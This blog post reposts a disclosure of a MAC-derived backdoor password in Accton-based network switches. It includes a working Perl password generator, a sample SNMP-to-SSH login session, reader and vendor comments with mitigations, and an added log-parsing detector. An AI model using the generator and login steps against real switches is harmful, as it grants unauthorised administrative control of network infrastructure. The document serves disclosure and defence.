This just came across and it’s pretty interesting. I haven’t heard of/seen this before, so I figured I’d repost it here. I don’t usually like to regurgitate stuff, but if I have nothing to write myself and I come across something that I consider to be valuable, interesting, insightful, or whatever, I will. :-)

[BEGIN REGURGITATION of http://www.exploit-db.com/exploits/14875/]

On the 15th of August 2009, at the HAR2009 conference, the existence of a backdoor password in Accton-based switches was revealed by Edwin Eefting, Erik Smit and Erwin Drent [1][2]. Even though this is a >365-day exploit, it does not seem to be listed in any of the vulnerability databases. Also, I could not find a patch for any of the vulnerable devices. According to the researchers, they contacted 3Com and Accton, but did not receive a response. I have a vulnerable 3Com 3812 in my lab and contacted the 3Com SRT months ago, but did not receive a response either. This seems to be a forgotten bug…

The Accton company builds switches, which are rebranded and sold by several manufacturers (including 3Com, Dell, SMC, Foundry and EdgeCore). The researchers list at least the 3Com 3812, 3Com 3870 and Edgecore ES4649 as vulnerable [3], but other vendors are affected as well. For example, I could also reproduce the behavior on a Dell PowerConnect 5224 switch.

The backdoor password can be calculated if you have the switch MAC address, which can be obtained via ARP or SNMP (if you know the community string). It seems to work on all management interfaces: telnet, ssh and http. If you don’t know the MAC address but can guess the OUI, brute forcing the password is probably feasible as well. A Perl script (accton.pl) to calculate the password from the MAC address is available at [4].

I’m hoping as a result of this e-mail, this will end up in vulnerability databases, scanners etc. I believe more vulnerable devices will show up as people start scanning their networks.

A sample SSH session with my 3Com 3812, running the latest available firmware (2.00):

$ snmpget -v1 -c public 192.168.104.99 IF-MIB::ifPhysAddress.1001
IF-MIB::ifPhysAddress.1001 = STRING: 0:d:54:9d:1b:90

[Matt's Note:]
If you’re on the same network segment as the switch, rather than using SNMP, use nmap, arping, or arp to get the MAC address.
[End of Matt's Note]

$ perl accton.pl 0:d:54:9d:1b:90
!F!RELUO

$ ssh __super@192.168.104.99
__super@192.168.104.99's password: !F!RELUO

Menu options: -------3Com SuperStack 3 Switch 3812 12-port---------------------
bridge - Administer bridge-wide parameters
feature - Administer system features
gettingStarted - Basic device configuration
logout - Logout of the Command Line Interface
physicalInterface - Administer physical interfaces
protocol - Administer protocols
security - Administer security
system - Administer system-level functions
trafficManagement - Administer traffic management

Type ? for help.
------------------------------------- (1)------------------------------------
Select menu option:

-------------------------------------references--------------------------------
[1] HAR2009 talk https://har2009.org/program/events/103.en.html
[2] HAR2009 slides http://www.vettebak.nl/hak/
[3] Backdoor description http://stuff.zoiah.net/doku.php?id=accton:backdoor
[4] Exploit calculator http://www.vettebak.nl/hak/accton.pl
---------------------------------------EOF-------------------------------------

#!/usr/bin/perl -w
use strict;
 
# Accton Mercury "__super" user proof of concept
# Disassembling and first PoC - smite@zylon.net.
# Disassembling and math - psy@datux.nl, gido@datux.nl
 
my $counter;
my $char;
 
my $mac = $ARGV[0];
my @mac;
 
foreach my $octet (split (":", $mac)) {
  push @mac, hex($octet);
}
 
if (!defined $mac[5]) {
    print "Usage: ./accton.pl 00:01:02:03:04:05\n";
    exit 1;
}
 
sub printchar {
    my ($char) = @_;
 
    $char = $char % 0x4b;
 
    if ($char <= 9 || ($char > 0x10 && $char < 0x2a) || $char > 0x30) {
        print pack("c*", $char+0x30);
    } else {
        print "!";
    }
}
 
 
for ($counter=0;$counter<5;$counter++) {
    $char = $mac[$counter];
    $char = $char + $mac[$counter+1];
    printchar($char);
}
 
for ($counter=0;$counter<3;$counter++) {
    $char = $mac[$counter];
    $char = $char + $mac[$counter+1];
    $char = $char +  0xF;
    printchar($char);
}
 
print "\n";
 
# Simplification of the loop:
# It was this:
#     $r11 = ($char * $key) >> 0x23;
#     $r10 = $char >> 0x1F;
#     $r9 = $r11 - $r10;
#     $r11 = $r9 << 2;
#     $r11 = $r11 + $r9;
#     $r9 = $r11 << 4;
#     $r9 = $r9 - $r11;
#     $char = $char - $r9;
#     $char = $char & 0xff;
# Substitute everything and convert the bit shifts to divisions:
# #   $char = $char  - ( (( ( (($char * $key) / 34359738368)  - ($char / 2147483648)) * 4 ) + ((($char * $key) / 34359738368)  - ($char / 2147483648) ) ) * 15) ;
# Then simplify:
# #     $char = $char  - (
# #     (
# #         ( (
# #             (($char * $key) / 34359738368)  - ($char / 2147483648)
# #         ) * 4 )
# #         +
# #         (
# #             (($char * $key) / 34359738368)  - ($char / 2147483648)
# #         )
# #     ) * 15
# #     ) ;
# #     $char = $char  - (
# #     (
# #         ( (
# #             4*( ($char * $key) / 34359738368)  - 4*($char / 2147483648)
# #         ) )
# #         +
# #         (
# #             (($char * $key) / 34359738368)  - ($char / 2147483648)
# #         )
# #     ) * 15
# #     ) ;
# Terms that always round to 0 drop out!
# print "char is $char (max is 510)\n";
# print 510 / 2147483648  ."\n";
# print "\n";
# You can see these as bit shifts that shift all the bits out to the right:
# #     $char = $char  - (
# #     (
# #         ( (
# #             (4* ( $char * $key / 34359738368)  ) 
# #         ) )
# #         +
# #         (
# #             (($char * $key) / 34359738368)  - ($char / 2147483648)
# #         )
# #     ) * 15
# #     ) ;
# #     $char = $char  - (
# #     (
# #         ( (
# #             (4* ( $char * $key / 34359738368)  ) 
# #         ) )
# #         +
# #         (
# #             (($char * $key) / 34359738368)  
# #         )
# #     ) * 15
# #     ) ;
# #     $char = $char  - (
# #     (
# #         ( (
# #             (5* ( $char * $key / 34359738368)  ) 
# #         ) )
# #     ) * 15
# #     ) ;
# #     $char = $char  - (75* ( $char * $key / 34359738368)   )  ;
# # This is a right shift by 35:
# #     $char = $char  - (75* ( $char * $key >> 35)   )  ;
# PWNED! ;)
#
#after printing out all the possible combinations, the only thing left was a modulo function!!!
#double pownage!!
# my $output;
# for ($char=0;$char<=0x1FE;$char++) {
#   $output = $char - (75 * (($char * 0x1B4E81B5 ) >> 35)   )  ;
#  
#   my $cool;
#   $cool = $char % 75 ;
#
#   if ($cool != $output)
#   {  
#       print "$char becomes $output and cool is $cool\n";
#   }
# }

[END OF REGURGITATION]

  1. Steve says:

    “I don’t understand why you would bother with snmp to get the MAC address. Kind of like using a sledge hammer to drive a tack. Nmap, arping, arp, etc. are all feasible ways to get the MAC address.”

    ARP is certainly the best way if the switch you are attacking is in the same broadcast domain, but the SNMP method would work from a different segment.

  2. Matt says:

    @Steve: Good point, didn’t even consider that. I stand corrected. :-)

  3. psy says:

    The reason to use SNMP instead of ARP is that you can use it over the internet (if it’s not firewalled, etc.), while the other methods require you to be on the same ethernet segment.

  4. [...] Backdoor Password in Accton Based Switches – attackvector.org On the 15th of august 2009, at the HAR2009 conference, the existence of a backdoor password in Accton-based switches was revealed by Edwin Eefting, Erik Smit and Erwin Drent. [...]

  5. CK says:

    hi, Matt,
    Thanks for bringing up this security issue.
    In order to help customers who forgot the password and don’t want to lose the configuration to log in to the switch and change the existing password, we provided this mechanism: if a customer provides us the MAC address of his switch, we will generate a unique password for that switch for him/her. It is regrettable that it came out to be a security issue.

  6. CK says:

    Last year, when we received the information that somebody broke the algorithm, we had already changed our firmware so that this password can’t be used via Telnet, Web etc. protocols over the network. This password is only valid when the administrator can physically reach the switch via console login.

    Some of the switches which had been phased out may still have the problem. If any customer has such a concern, please contact us; we will take full responsibility to help him/her fix the problem.

    Thanks again for your attention to prevent people using our switches from being attacked. It is also our responsibility. Should you have any suggestion or comment, please feel free to contact me.

    Best Regards
    C.K.NG

  7. Matt says:

    @CK: I understand your argument, but my take is this:

    If, say, 2% of your customer base forget their passwords and have to reset their devices and start from scratch, why would you put the other 98% of your customer base at risk for getting owned? Personally, if I ran one of your routers/switches/whatever and found out that I had lost trade secrets or valuable information due to a hole that your company intentionally put into my router/switch, you would have a lawsuit on your hands.

    It is not your responsibility to provide a way for your customers to log in to their device if they’ve forgotten their password. If they’ve made the mistake of setting a password and not documenting it, remembering it, something, that is not your company’s issue – it’s theirs. And, if they have to reset their router/switch as a result of their carelessness, maybe the task of reconfiguring the router will make them be a little more diligent the next time.

    All of us have forgotten our passwords to something at some point in our lives. I’ve hit the “reset” button on many devices in my day due to not having documented a password. This is my own fault and I accept that.

  8. CK says:

    Dear Matt,
    Thanks for your comment; you are absolutely correct. But it also shows that our company cares about customers, even if they are the 2%.

    Anyway, I think if customers use the switch properly, they won’t be attacked via the super password issue.

    Firstly, normally customers will separate the user VLAN from the management VLAN, so users can reach the switch.

    Secondly, even if the user and switch are in the same VLAN (subnet), or the management VLAN can be accessed by routing, we still have a way to prevent the switch from attack,

    by using the command shown below, only specified management IPs can access the switch.

    Console#config
    Console(config)#management ?
    all-client Adds IP addresses to SNMP, Web and Telnet groups
    http-client Adds IP addresses to the Web group
    snmp-client Adds IP addresses to the SNMP group
    telnet-client Adds IP addresses to the Telnet group
    Console(config)#management all-client ?
    A.B.C.D Starts IP address
    Console(config)#management all-client 192.168.1.1 ?
    A.B.C.D Ends IP address

    Console(config)#management all-client 192.168.1.1 192.168.1.10

    Only IP addresses within 192.168.1.1-10 can access the switch via telnet, http, snmp or all.

    Using this method, users also can’t get the MAC of the switch via SNMP.

    Please comment if it addresses your concern. Thanks.

  9. CK says:

    Please also don’t forget to change the default username and password.

    Console(config)#no username guest
    Console(config)#no username admin
    Console(config)#username ck_ng password 0 Support
    Console(config)#enable password level 15 0 Support

    From the log you can also see who has logged in to the switch:

    Console#sh log ram

    [488] 02:11:09 2001-01-01
    "LoginSuccess,__super,WEB,10.2.32.162"

    [20] 00:11:58 2001-01-01
    "LoginSuccess,ck_ng,Console,10.2.4.21"
    level: 6, module: 5, function: 1, and event no.: 1

    [18] 00:11:34 2001-01-01
    "LoginFailure,guest,Console,10.2.4.21"

    [15] 00:09:29 2001-01-01
    "LoginFailure,admin,Console,10.2.4.21"
    level: 6, module: 5, function: 1, and event no.: 1
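As an added example (not part of the advisory, the script or the comments above), a small Python parser for the `sh log ram` format quoted in the previous comment that flags any login by the vendor account and any activity against the default accounts. The log lines are constructed to match the quoted entries, and the severity scheme is an assumption for illustration.

```python
import re
# Constructed sample of "sh log ram" output, modelled on the entries quoted in
# the comment above; it is not a capture from a real switch.
SAMPLE_LOG = """\
[488] 02:11:09 2001-01-01
"LoginSuccess,__super,WEB,10.2.32.162"
[20] 00:11:58 2001-01-01
"LoginSuccess,ck_ng,Console,10.2.4.21"
level: 6, module: 5, function: 1, and event no.: 1
[18] 00:11:34 2001-01-01
"LoginFailure,guest,Console,10.2.4.21"
"""

BACKDOOR_USER = "__super"            # the vendor account the advisory describes
DEFAULT_USERS = {"admin", "guest"}   # factory accounts the vendor says to remove

HEADER = re.compile(r"^\[(\d+)\]\s+(\S+ \S+)$")
EVENT = re.compile(r'^"(Login(?:Success|Failure)),([^,]*),([^,]*),([^"]*)"$')

def parse_log(text: str) -> list[dict]:
    """Pair each [seq] header with the quoted login record after it; the
    optional 'level: ...' detail line matches neither pattern and is skipped."""
    events, header = [], None
    for line in text.splitlines():
        m = HEADER.match(line.strip())
        if m:
            header = {"seq": int(m.group(1)), "when": m.group(2)}
            continue
        m = EVENT.match(line.strip())
        if m and header:
            events.append({**header, **dict(zip(("result", "user", "interface", "source"), m.groups()))})
            header = None
    return events

def findings(events: list[dict]) -> list[str]:
    """Backdoor account over a network interface is CRITICAL (the vendor says fixed
    firmware accepts it only on the console), on the console HIGH; default accounts MEDIUM."""
    out = []
    for e in events:
        if e["user"] == BACKDOOR_USER:
            sev = "HIGH" if e["interface"] == "Console" else "CRITICAL"
        elif e["user"] in DEFAULT_USERS:
            sev = "MEDIUM"
        else:
            continue
        out.append(f'{sev} seq={e["seq"]} {e["result"]} user={e["user"]} '
                   f'via={e["interface"]} from={e["source"]}')
    return out
```

Feed it the saved output of `sh log ram` from a switch and review every CRITICAL line against the management access list from the earlier comment.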
